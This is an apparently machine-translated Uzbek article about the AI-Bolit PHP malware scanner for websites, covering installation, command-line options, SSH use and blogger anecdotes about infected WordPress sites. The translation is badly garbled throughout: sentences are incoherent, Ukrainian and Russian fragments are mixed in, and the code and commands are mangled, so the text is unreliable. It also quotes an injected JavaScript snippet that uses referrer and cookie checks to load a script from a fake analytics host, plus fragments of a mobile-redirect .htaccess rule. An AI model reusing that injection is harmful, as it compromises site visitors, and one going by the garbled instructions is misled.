Veb-virus skaner qobig'i php.

Golovna Asosiy funksionallik AI-Bolit - viruslar va boshqalar uchun samarali skaner

chegirma kodi

xostingda

Bizdan tez-tez so'rashadi - nega AI-Bolit skaneri noyob?

U maldet, clamav va ish stoli antiviruslari kabi zararli kodlarni aniqlash uchun boshqa shunga o'xshash vositalardan nimasi bilan farq qiladi?

Qisqa javob shundaki, u PHP va Perlda yozilgan iflos kodni yaxshiroq aniqlaydi.

Nega? Javob pastroq. Har kuni kambag'al kod (hacker veb-qobig'lari, orqa eshiklar va boshqalar) yanada murakkab va katlanadigan bo'ladi.
Identifikatorlarni xiralashtirish va kodlarni shifrlash jinoyati

AI-Bolitning keng ommalashishi, shuningdek, uning oddiy interfeysi va notijorat usullardan bepul foydalanish imkoniyati bilan bog'liq.

Har qanday webmaster AI-Bolit-ni http://revisium.com/ai/ rasmiy veb-saytidan mutlaqo bepul yuklab olishi va o'z resursini xaker qobiqlari, orqa eshiklar, eshiklar, viruslar, spam-qaroqchilar va boshqalar mavjudligini tekshirishi mumkin. qo'shimchalar.

• Skanerdan tijorat kompaniyalari - veb-studiyalar, hosting kompaniyalari va mijozlar saytlarini tekshirish va tozalash uchun onlayn agentliklar ham faol foydalanmoqda.
• Xosterlar AI-Bolitni boshqaruv paneliga birlashtiradi, veb-ishlab chiquvchilar undan yomon kodni qidirish uchun foydalanadilar va davlat xizmatlaridagi saytlarni kuzatish uchun foydalanadilar.
• Quyida Ai-Bolit skanerining imkoniyatlarining qisqacha ro'yxati keltirilgan:
• brauzer konsolidan ishga tushiring uchta skanerlash rejimi (“oddiy”, “ekspert”, “paranoyak”) va ikkita robot rejimi (“ekspress” va “tashqi skanerlash”) Hacker PHP va Perl skriptlarini (qobiqlar, orqa eshiklar), virus qo'shimchalarini, eshiklarni, spamlarni, pochta orqali sotiladigan skriptlarni, yashirin skriptlarni va boshqa turdagi yomon skriptlarni qidiring.
• Shakllar va oddiy iboralarni qidiring, shuningdek potentsial zaif kodni aniqlash uchun evristikadan foydalaning shifrlash, parchalanish imzolarini qidirish matn bloklari
• va hex/oct/dec kodlangan ketma-ketliklar
• qidirish
• shubhali fayllar

Fayllarda Poshuk Prihovanih posilan

ramziy xabarlarni qidiring

Qidiruv va mobil yo'naltirishlar kodini qidiring va boshqa ko'p narsalar. Gapirishdan oldin, RosPatentdan Ai-Bolit bo'yicha mualliflik guvohnomasi bekor qilindi. Skaner shuningdek, uchinchi tomon saytlarida, professional jurnallarda, konferentsiyalar va vebinarlarda faol namoyish etiladi.

Muammo shundaki, skript sotuvchilarga rasm faqat kengaytirilgan fayldan olinishini tekshirish orqali saytga rasmlarni import qilish imkonini beradi. Buning o'rniga, umuman tekshirmasdan. Demak, ishlashning hojati yo'q;) Natijada, saytga har qanday e'tiborni jalb qilishingiz mumkin

php fayli

rasm ko'rinishi ostida.

Ale siklar haqida emas ... Mova saytdagi barcha fayllarni viruslar va troyanlar uchun tekshirishga majbur bo'lganlar haqida. Saytda virus borligini tekshirish Internetda har qanday saytni virus bilan qayta tekshirish ushbu turdagi so'zlarga umuman mos kelmaydi. Onlayn skanerlar qidiruv tizimi roboti kabi harakat qiladi va doimiy ravishda hamma narsani tekshiradi

mavjud sahifalar

veb-sayt.

Sayt tomoniga o'tishdan keyin saytning boshqa qismlaridan xabarlar keladi.

Javob.

Agar yovuz niyatli shaxs sizni qo'shimcha suratlar uchun saytga orqa eshik bilan to'ldirib yuborsa va bu rasmni sayt sahifalarining istalgan joyiga yuborgan bo'lsa, u xuddi virusni sahifalarga qo'ygandek, saytga aylanmay, buzilmaydi, keyin

onlayn tekshirish

Virusli saytda siz shunchaki bu rasmlarni bilmaysiz va virusni bilmaysiz.

• Nima so‘rayapsan, yomonlik qilganga shunchalik qo‘rqinchli bo‘lish kerakmi? Hech narsa qilmasdan orqa eshikni suv bosgan yaxshiroqmi? Vídpovym - spam uchun, DDoS uchun.
• Sayt sahifalarida hech qanday tarzda ko'rsatilmagan boshqa zararli harakatlar uchun.

Bir so'z bilan aytganda, virusli saytni onlayn tekshirish butunlay xotirjamlik uchun juda zarur.

WordPress saytida viruslar va troyanlarni tekshirish uchun plagin WordPress uchun premium antivirus plagini mavjud. U vin deb ataladi.

Siz o'zingizning vikoristingizdan umumiy hostingda unga qaramasdan foydalanishingiz mumkin, lekin menimcha, bu mumkin.

AI-Bolit PHP da yozadi va brauzerdan ishga tushirilishi mumkin. Shuning uchun u faqat texnik xususiyatga ega - ohangdor, ehtimol hatto birgalikda.

Muhim!

Aibolit viruslar uchun saytni yoqtirmaydi - ularni faqat topishingiz mumkin

• Bu qaysi fayllar xavfli bo'lishi mumkinligini ko'rsatadi.
• Ular bilan ishlash haqida qanday fikrdasiz?
• Shunday qilib, shunchaki ahmoqona tugmani bosish va saytni o'chirib qo'yish troyanlarga qarshi ishlamaydi.
• AI-Bolit-ni VDS-da ssh bilan qanday ishlatish kerak
• Aibolitda ushbu antivirusdan foydalanish bo'yicha ko'rsatmalar va mahorat darslari mavjud.<дата>-<время>Zagalny shaklida ketma-ketlik oddiy:

yuklab oling

serverga ochish (men/root/ai dan ochdim)

Keyin ssh konsolidan php /root/ai/ai-bolit/ai-bolit.php ni ishga tushiramiz.

tekshirish bir yilga cho'zilishi mumkin, saytni majburlash muhimdir

Tekshiruv sumkalarining orqasida fayl yaratiladi AI-BOLIT-REPORT-

# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN="sayt" AI_PATH="/root/ai" NOW=$(sana +" %F-%k-%M-%S") # siz parolga kirish huquqiga ega umumiy papka yaratishingiz mumkin REPORT_PATH="$AI_PATH/reports/$DOMAIN-$NOW.html" SCAN_PATH="/home/azzrael/web/$ DOMAIN/ public_html/" SCAN_DAYS=90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH # Faqat o'zgarishlar fayllarini skanerlash X kun # AI-BOLIT-DOUBLECHECK.php AIbolit tomonidan qattiq kodlangan --with-2check !!!

#tarix -c

Bu erda siz find buyrug'i orqali biz SCAN_DAYS qolgan vaqt davomida yaratilgan barcha fayllarni tanlaganimizni ko'rishingiz mumkin, biz ularni AI-BOLIT-DOUBLECHECK.php ro'yxatida saqlaymiz (faylni ro'yxatga qo'shishdan oldin, uni o'zgartirish vaqtida uni o'zgartiring. mumkin emas edi), keyin biz ushbu ro'yxatni yaratamiz aibolit .

Bir kunga SCAN_DAYS qo‘shilishi mumkin.

Qanday qilib veb-saytda virus borligini pulli yoki bepul tekshirish mumkin?

Ushbu maqola sizga veb-saytingizni viruslar uchun tekshirishning bir qancha usullari haqida gapirib beradi:

Onlayn antivirus eng oddiy, ammo ayni paytda eng ishonchli usuldir.

Antivirus Aibolit eng ishonchli va ayni paytda eng murakkab usuldir.

Antivirus veb-sayti Virus kuni - Eng yaxshi variant.

Saytda xavfli virusga ega bo'lganlar haqida bir oz boshlaylik.

Nima uchun sayt xavfli?

Bir oz nazariya maxsus bildirishnoma- deb bir necha marta nola qildilar.

Sizning saytingiz virus bilan zararlanganmi?
Sizning saytingizga kirishni rad etgan holda, yovuz niyatli jinoyatchilar quyidagilarni amalga oshirishi mumkin:
Trafikingizni loyihalaringizga yo'naltirishni boshlang.
Uchinchi shaxslarga sotish uchun server va ma'lumotlar bazasiga egalik qiling.
Veb-saytdagi aloqa va to'lov ma'lumotlarini o'zgartiring, mijozlardan shaxsiy ma'lumotlarni o'g'irlang.
Veb-saytingizda spam-xabarlarni o'z ichiga olgan eshiklarni joylashtiring.
Saytdan viruslar, troyanlar va ekspluatatsiyalarni olib tashlang.

Serveringizdan spam qaytarilishini amalga oshiring. Ruxsatsiz kirish uchun boshqa jinoyatchilarga buzilgan saytga kirish huquqini soting. Esda tuting:

virusli veb-saytlar sanktsiyalarga duchor bo'lishi mumkin

tovush tizimlari va pozitsiyalari. Mening xostingim yangi odamlarga hujum qilib, xakerlar tomonidan bir necha marta bombardimon qilingan. Qo'rqishga arziydimi?

Maqsad oddiy: parollaringizga kirishni taqiqlash yoki kodning sizib chiqishi orqali saytingizga virusni kiritish. Va bu shuni anglatadiki, so'nggi ikki kun ichida men ko'proq saytlarim ular bilan suv bosganini ko'rdim.

Biroq, mening saytlarim bundan keyin zararlanganligi sababli, parollarni o'zgartirish ko'p ish qilmaydi.

Va hamma narsa yana takrorlanmasligiga kafolat yo'q. Keyin yana manzilni kiritganimda saytga va admin panelga ham kiraman. .

Shunchaki veb-sayt manzilini kiriting va xizmat veb-saytingizda viruslar mavjudligini tekshirguncha kuting.

Agar siz shubhali deb topilsa, unda bu shunday bo'ladi.

Agar ushbu onlayn antivirus bilan hech narsa topmasangiz, boshqa yechimni sinab ko'ring.

Skript yordamida veb-saytni virusga qanday tekshirish mumkin?

Aynan shu kuni men barcha saytlarimni Aibolit antivirusi bilan tekshirib chiqdim va asosiy saytim zararlanganligini aniqladim. Antivirus nima va undan qanday foydalanish kerak? Ushbu antivirusni sotuvchining veb-saytidan yuklab olish mumkin.

Aibolit.

Hozirda Windows uchun versiya mavjud bo'lib, u faqat hosting orqali amalga oshirilishi mumkin edi.
Ushbu antivirus veb-sayt uchun nima qilishi mumkin?
?
Eksa: - xostingdagi viruslar, yomon va xakerlik skriptlari haqida hazil: imzolar uchun qobiqlar va aqldan ozgan naqshlar, noqulay evristikaga asoslangan qobiqlar - asosiy antiviruslar va skanerlar topa olmaydigan barcha narsalar.- timthumb, fckeditor, uploadify va boshqalardan skriptlarni qidirish.
- Arzon narxlardagi saytlarda .htaccess da qayta yo'naltirishni qidiring.
- Shukati kodi
posilalnyh almashinuvi
.php fayllarida sape/trustlink/linkfeed/… kabi
— kataloglar va eshik fayllarini belgilash.

- Shablonlarda bo'sh postlarni (ko'rinmas xabarlar) tanlang.

- Kataloglarni ko'rsatish, yozib olish uchun ochiq.

- Cms dan aybsiz foydalaning (joomla, wordpress, drupal, dle, bitrix, phpbb, ...)

— qo'ng'iroqni elektron pochta orqali yuboring yoki faylni saqlang. O'rnatish oddiy: Rospakovuu Arkhvu bizning saytimizning AI-Bolit.php fayllari papkasida, .Aignore, .Aurlignore Z papkalari AI-Bolit, FAIL IN THE FAILS KNOWN_FILES, YAI VIDPOVID VERSIA NASHIA CMS, mening viplopimda WordPress _3_ . Fayllarga to'g'ri ruxsatlarni o'rnatish kerak bo'lishi mumkin, masalan, 755.

Xo'sh, to'g'ri xostingga ega bo'lganlar uchun siz terminalga borishingiz kerak (menda Linux bor, shuning uchun sizga hech qanday emulyatorlar kerak emas) va keyin SSH orqali hostingimizga ulanishingiz kerak.

Ssh LOGIN@SERVER_ADDRESS

Qanday qilib aniq ishlash kerak, men tushuntirmayman, chunki siz mavzuda emassiz, demak, bu erda kerak Individual yondashuv

, izohlarda yozing, men tushuntiraman.

Ulangandan so'ng, sayt bilan jildga qo'shimcha cd buyrug'ini bajarishingiz kerak. (12)

Ammo ma'lum bo'lishicha, faqat bitta virus bor edi va bu yechim yozuvlarni shifrlashga o'xshash sertifikatlarga murojaat qilish edi.

Bu erda boshlashning eng oson yo'li - u erda nima bo'lishidan qat'i nazar, toza WordPressni olish va har qanday shubhali fayllarni aniqlash.

Asl nusxadagi hamma narsa bir xil bo'lgani uchun maqtanishning hojati yo'q.

Aks holda, iflos kod o'chiriladi.

Dali menga baqirdi:

Kengaytirilgan kengaytirish, kontentni shifrlash va zararli skriptdan shubhalanish.

Kerakli qo'shimcha ma'lumotlarni tahlil qilish: (14)

Bitta plagin uchun paydo bo'ladigan antivirus - TOP 10 - bu muammo ekanligini aytmaydi. Ta'minot zanjiri bilan bog'liq boshqa muammolar ham bor edi.

Xuddi shu evristik tahlil Wordpress fayllarida amalga oshirildi, lekin men asl nusxalarga qaradim va hamma narsa yaxshi edi.

Ushbu fayllar ko'rinmas xabarlarni o'z ichiga oladi.

Keraksiz spamdan ehtiyot bo'ling:

Bu erda menda UP tugmasini yaratadigan plagin bor - yangi joyda. Virus kuni Plaginlar haqida gap ketganda, ularda qandaydir xabar bo'lishi mumkinligini tushunishingiz kerak.

Aks holda, indekslash uchun plaginlar bilan papkalarni yopish oson.

Wordpress-da siz robot.txt-ga qator kiritishdan boshlashingiz mumkin Ruxsat bermaslik: /wp-content/plugins Teri muammolari uchun hamma narsa individualroq bo'ladi, shuning uchun maxsus yozish muhimdir.

Yo'nalishni aniqlash uchun ko'proq meta-statistik ma'lumotlar mavjud.

Hammasi yaxshi bo'lardi, lekin bir narsa etishmayapti - doimiy monitoring.

Siz hozirda ushbu antivirusni ishga tushira olmaysiz va xakerlar kechayu kunduz ishlaydi. Va bu erda bizga yana bir ajoyib xizmat yordam beradi.
Xizmat yordamida veb-saytni qanday tekshirish mumkin? Saytni viruslar uchun avtomatik tekshirish.

Saytda bilgan virusni qanday olib tashlashim mumkin? Men qo'lda topishga harakat qilaman yoki pulli rejaga yozilarman, chunki veb-sayt xavfsizligi juda muhim. Hamma narsa uchun pul to'lamoqchi bo'lib, men bu infektsiyani umumiy hostingdan olib keldim, endi menda bor Ish stoli VPS lekin alohida muammolar yo'q edi.

Otje,

Virusday kuni ro'yxatdan o'ting

va veb-saytingizni ulang.

Agar siz saytingizni viruslar bor-yo'qligini tekshirishning boshqa usullarini bilsangiz va yaxshiroq narxga ega bo'lsangiz, ular haqida bilish hamma uchun foydali bo'ladi. Kecha men virusga javob bermay qoldim - mening barcha saytlarim zararlangan. Men kompyuterda bo'lganim va muammoni darhol payqaganim yaxshi.

Nima bo'ldi? Mening saytlarimdan biri qandaydir tanishuv saytiga, behayo saytga o'tkazila boshlandi. Mening domenimga kirganingizda, siz ushbu spam-saytga yo'naltirilasiz.

Bu juda yomon holat, shuning uchun muammoni darhol hal qilmasangiz, maslahatchilaringiz bilan muammoga duch kelishingiz mumkin.

Va agar u uzoq vaqt davomida bir xil bo'lmasa, unda

ovoz tizimlari

Siz saytingizga filtr qo'shishingiz mumkin va siz qidiruvdagi barcha pozitsiyalarni yo'qotasiz.

Men allaqachon ular haqida bir narsa yozganman, lekin ichida










mobile|midp|mmp|netfront|palm(os)?|telefon|p(ixi|re)/|plucker|cho'ntak|psp|seriya (4|6)0|

wadofone|wap|windows (ce|phone)|xda|xiino RewriteCond%(HTTP_USER_AGENT) )|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu| ar(ch|go)|

|-m | r | s) | avan | be (ck | )|c55/|capi|ccwa|cdm-|hujayra|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|

|d(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|

|fetc|fly(-|_)|g1 u|g560|gen|gf-5|g-mo|go(.w|od)|gr(ad|un)|

t)|hei-|hi(pt|ta)|hp(i|ip)|hs-c|

aw|tc)|i-(20|go|ma)|i230|iac(|-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro |jemu|jigs|kddi|keji|kgt (|/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg(g|/(k|l|u)| m1 -w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef | mo(01|02|bi|de|do|t(-| mt(50|p1|v)|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7 (0(0|1) | 10) | |phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt- g|qa-a|qc(07|12|21|32|60|- |i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma| mm | ms | ny | va) sc (01 | h- | oo | p -) |. sdk / |. se (- | 0 | 1) | 47 | sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)| so(ft|ny)|sp(01|h-|v-|v) |sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)| tcl-|tdg-|t(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750| (40|5|-v)|vm40|voda |vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-|)|webc|whit|wi( g | nc | nw) |. |. zte-) >> SECURE .HTACCESS

Men uni endigina ko'rganim uchun hamma narsa talab qilinganidek ishlay boshladi. Hammasini qilishim uchun 5 daqiqa vaqt ketdi.

Texnik yordam menga boshqa saytim spam yuborayotganini yozganida, men bu muammoni hal qila olmadim.

Ma'lum bo'lishicha, bitta plaginga ega jildga uchinchi tomon php fayli yuklangan va u orqali spam yuborilgan. Men ushbu faylni ko'rib chiqdim va muammo davom etdi.?

WordPress Windows bilan bir xil emasligi haqida menda allaqachon aniq taassurot bor. sim robiti haqida nima deyish mumkin AI-BOLIT skanerini rejimda ishga tushirishda mavjud bo'lgan eng katta funksionallik

buyruq qatori . Siz Windows/Unix/Mac OS X ostida ham, to'g'ridan-to'g'ri xostingda ham ishlashingiz mumkin, agar sizda SSH orqali kirish imkoningiz bo'lsa va hosting protsessor resurslarini sezilarli darajada cheklamasa, bu pulni tejaydi. Skanerni ishga tushirish uchun sizga PHP 7.1 yoki undan yuqori versiyaning konsol versiyasi kerakligidan afsusdamiz. Ko'proq

dastlabki versiyalari

Rasmiy yordam yo'q.

Uni aylantiring

Versiyani yangilayman

php -v buyrug'i bilan

AI-BOLIT skanerining buyruq qatori parametrlarini yakunlash

Menga ko'rsat, men sizga yordam beraman

php ai-bolit.php --help

php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov

Kengaytirilgan qo'shiqlarni skanerlang

php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,shubhali,tpl

Hujjatlarni xavfsizlik xodimlariga yuborish uchun karantin uchun fayl tayyorlang.

AI-QUARANTINE-XXXX.zip arxivi parol yordamida yaratiladi.

php ai-bolit.php --karantin

Skanerni "paranoid" rejimida ishga tushiring (eng batafsil ovozni olish uchun tavsiya etiladi)

php ai-bolit.php --mode=2

php ai-bolit.php --mode=1

Yomon kod uchun bitta "pms.db" faylini tekshiring

php ai-bolit.php -jpms.db

Skanerni 512 Mb xotira hajmi bilan ishga tushiring php ai-bolit.php --xotira=512M

Tasdiqlanadigan maksimal fayl hajmini 900 Kb o'rnating php ai-bolit.php --xotira=512M

php ai-bolit.php --size=900K

Skanerlash vaqtida fayllar o'rtasida 500 ms pauza qiling (intensivlikni kamaytirish uchun)

php ai-bolit.php --delay=500

Elektron pochtaga skanerlash haqida xabar yuboring

[elektron pochta himoyalangan]

php ai-bolit.php

/home/scanned/report_site1.html faylida qo'ng'iroq yarating

php ai-bolit.php --report=/home/scanned/report_site1.html

/home/s/site1/public_html/ katalogini skanerlang (agar --report=file_file opsiyasi ko'rsatilmagan bo'lsa, undagi har qanday ijod mavjudligini tekshiring)

php ai-bolit.php --path=/home/s/site1/public_html/

AI-BOLIT skanerini boshqa unix buyruqlari bilan birlashtirib, siz, masalan, saytlarni ommaviy skanerlashingiz mumkin.

Quyida biz bulut yozuvining o'rtasida joylashgan bir nechta saytlarni qanday tekshirishni ko'rsatamiz.

Misol uchun, agar saytlar /var/www/user1/data/www katalogining o'rtasida joylashgan bo'lsa, skanerni ishga tushirish buyrug'i bo'ladi.

toping /var/www/user1/data/www -maxdepth 1 -turi d -exec php ai-bolit.php --path=() --mode=2 \;

--report parametrini qo'shish orqali siz skanerlash hisobotlari joylashtiriladigan katalogni tanlashingiz mumkin. php ai-bolit.php parametrlar ro'yxati... --eng Interfeysni ingliz tiliga o'tkazing.

Ushbu parametr

Qolganlari ketsin.

Boshqa xizmatlar bilan va hosting paneliga integratsiya

php ai-bolit.php --json_report=/path/file.json

Ovozni json formatida shakllantirish

php ai-bolit.php --progress=/path/progress.json

json faylining tekshirish holatini saqlang.

Bu fayl json formatidagi eng tuzilgan maʼlumotlarga ega: joriy tekshirish fayli, qancha fayl tekshirilganligi, tekshirish uchun qancha fayl qolganligi, tekshirishlar soni, skanerlash tugashidan bir soat oldin. Ushbu mexanizm jarayon paneli va panelda tekshirilayotgan fayllar haqidagi ma'lumotlarni ko'rsatish uchun o'zgartirilishi mumkin. Skanerlash tugallangandan so'ng, fayl avtomatik ravishda o'chiriladi. php ai-bolit.php --handler=/path/hander.php Tashqi kompilyator ishga tushdi.

Siz skanerlashning boshiga/tugallanganiga/skanerlashning borishiga/skanerlashni olib tashlashga eng soʻnggi jildlarni qoʻshishingiz mumkin. Namuna faylni skaner arxivida, tools/handler.php katalogida ko'rish mumkin. Masalan, skanerlash tugallangandan so'ng siz fayl bilan ishlashingiz mumkin (pochta orqali yuborish, arxivga to'plash va h.k.).

Bugun ular onlayn-do'konni viruslardan tozalashda yordam so'rab men bilan bog'lanishdi.

Ushbu spivorotniklardan biri uchun qoniqarsiz vidmova keldi

Var r=document.referrer;

var c=document.cookie;

r1=0;

agar ((r.indexOf("yandex")>0) || (r.indexOf("google")>0) || (r.indexOf("rambler")>0) || (r.indexOf(" mail")>0)) ( document.cookie = "__ga1=1; expires=Chor, 1-mart 2020-yil 00:00:00; path=/;"; r1=1; ) boshqacha (agar (c.indexOf(") __ga1")==-1)(document.cookie = "__ga2=1; expires=Chor, 1-mart 2020-yil 00:00:00; path=/;";)) agar (((c.indexOf("__ga1") ) )>-1) || (r1==1)) && (c.indexOf("__ga2")==-1)) (document.write(unescape("%3Cscript src="http://google- tahlil qilish .com/urchin.js" type="text/javascript"%3E%3C/script%3E");)

Keyin biz ssh kirish orqali ulanamiz, masalan, qo'shimcha macun yordamida va iloji bo'lsa, saytdagi arxivlar bilan ishlaymiz.

Buning uchun konsolda tajovuzkor buyruqni tezda kiritish kifoya:

tar - cf zaxira .tar /home/login/site/public_html */home/login/site/public_html - saytning asosiy katalogiga to'g'ridan-to'g'ri yo'nalish Saytning zaxira nusxasini yaratish mumkin va ishlamayapti, lekin siz uni muhimroq deb bilmaysizmi?

Endi saytni virusga tekshirishning ikkita varianti mavjud 1. Saytni tekshiring Iltimos, php ga yordam bering

Turli viruslar va PHP qobig'ini qidiradigan Ai-Bolit skripti.

2. Butun saytni kompyuteringizga yuklab oling va yuklab oling

Avast antivirus

• , lekin birinchi variant sezilarli darajada qisqaroq, aniqroq va sezilarli darajada aniqroq.
• Mahalliy kompyuteringizda saytni tozalash

Men boshqa usuldan boshlayman, shuning uchun men yoga o'zini tasvirlab beraman.

Barcha fayllar (yoki arxivlar) kompyuterga yuklab olingandan so'ng va ularning kamida 25 000 tasi bor edi, men Avast-ni ochdim va bepul skriptlarni tekshirish uchun fayllar bilan papkani saytga ko'rsatdim.

Avast fayllarni o'z ichiga olgan papkani tekshirgandan so'ng, veb-sayt ikkita skript virusini aniqladi:

Php-Shell-Jv

Js-Redirector-Fc index.php fayli quyidagi koddan iborat:"ui.datepicker_old.js" javascript fayli skriptning eng quyi qismida yomon kodga ega.

Ushbu kodni o'chirish kerak!

Ai-Bolit yordamida saytni viruslardan tozalash.

FTP usuli.

1. Arxivlarni Aibolit skripti yoqilgan holda saqlash mahalliy kompyuter

Keling, uni ochamiz.

2. Ftp-ni qo'shimcha FileZilla mijoziga ulang Agar siz katalogdagi barcha saytlarni tekshirishingiz kerak bo'lsa, skriptni /home/domains/ yoki /home/ jildiga qo'ying, keyin Ai-Bolit barcha papkalarni rekursiv ravishda o'tadi va bitta domenni tekshirish osonroq ko'rinadi. bir vaqtning o'zida.

Konsol opsiyasi (SSH)

1. Putty dasturini yoki boshqa konsol dasturini ishga tushiring.

2. Xost va parol yordamida serverga ulaning.

3. Buyruq yordamida saytning asosiy katalogiga o'ting cd /home/login/veb-saytingiz/public_html/

4. Biz buyruq bilan skriptni o'zgartiramiz wget http://www..zip

5. Paketni ochish zip arxivlari buyruq bilan unzip 20160904_112415ai-bolit.zip

6. Skriptni ishga tushiring php ai-bolit.php

Ishga tushirish uchun fon rejimi Vikoristning buyrug'i: ekran -d -m php ai-bolit.php

7. Skript hali ham tekshirilayotganligini tekshiring va " kabi ovoz chiqaring. mahalliy kompyuter"serverda.

Shuni ham yodda tutingki, agar sizning serveringizda 5.3 dan pastroq php o'rnatilgan bo'lsa, Aibolit sizga xabar ko'rsatadi va skanerdan o'tkazmaydi.

Men tasodifan saytni yuklab oldim va uni serverimda tekshirdim.

Rasm fayli serverda yaratilgandan so'ng uni kompyuteringizga yuklab olishingiz va uni joriy brauzeringizda (Chrome, Firefox va boshqalar) ko'rishingiz mumkin. Avvalo, "Skildy skriptlar" haqidagi ma'lumotlarga e'tibor bering va keyin ushbu fayllarni ehtiyotkorlik bilan o'chiring yoki ularni tozalang. qo'lda